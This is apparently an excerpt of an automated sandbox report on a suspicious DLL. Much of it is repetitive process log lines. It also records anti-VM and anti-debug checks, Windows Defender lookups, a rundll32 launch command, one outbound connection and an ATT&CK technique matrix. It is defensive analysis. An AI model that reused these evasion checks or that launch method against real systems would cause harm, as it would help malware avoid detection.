Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Users\user\Desktop\VMware Workstation.lnkJump to behavior
Source: C:\Windows\System32\loaddll64.exe TID: 5328Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00415080 FindFirstFileW,FindClose,5_2_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 5_1_00415080 FindFirstFileW,5_1_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 6_1_00415080 FindFirstFileW,6_1_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00415080 FindFirstFileW,FindClose,14_2_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00415080 FindFirstFileW,FindClose,18_2_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00415080 FindFirstFileW,FindClose,19_2_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 5_1_00417CD0 GetSystemInfo,5_1_00417CD0
Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dec_e26d2cbdf0ab1647723bb3a38bd2737c2e0af57_b4dfb63c_b9ef1030-2491-4365-a391-35e17ec755ab\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dec_27d8c3fe9e4ce467db0e38d9cdded62657c28_b4dfb63c_07fe291b-769a-411f-9cce-c267542d2e67\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueueJump to behavior
Source: Amcache.hve.10.drBinary or memory string: VMware
Source: decrypt-main.dll.dllBinary or memory string: \VMware Workstation.lnk
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
Source: rundll32.exe, 00000012.00000002.4039185577.000001C24023E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sers\user\Desktop\VMware Workstation.lnk
Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: rundll32.exe, 00000005.00000002.2533961841.000001FA1D377000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2533961841.000001FA1D38C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: rundll32.exe, 00000013.00000002.4038907820.000001D5FC72C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sers\user\Desktop\VMware Workstation.lnkp
Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: rundll32.exe, 00000005.00000002.2533961841.000001FA1D38C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.drBinary or memory string: vmci.sys
Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: rundll32.exe, 00000013.00000002.4039085865.000001D5FE0A4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 0C:\Users\user\Desktop\VMware Workstation.lnk
Source: Amcache.hve.10.drBinary or memory string: VMware20,1
Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 52.95.163.36 443Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1Jump to behavior
Source: C:\Windows\System32\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,5_2_00415230
Source: C:\Windows\System32\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_004142E0
Source: C:\Windows\System32\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,14_2_00415230
Source: C:\Windows\System32\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_004142E0
Source: C:\Windows\System32\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,18_2_00415230
Source: C:\Windows\System32\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_004142E0
Source: C:\Windows\System32\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,19_2_00415230
Source: C:\Windows\System32\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_004142E0
Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
111
Process Injection
2
Masquerading
OS Credential Dumping31
Security Software Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
31
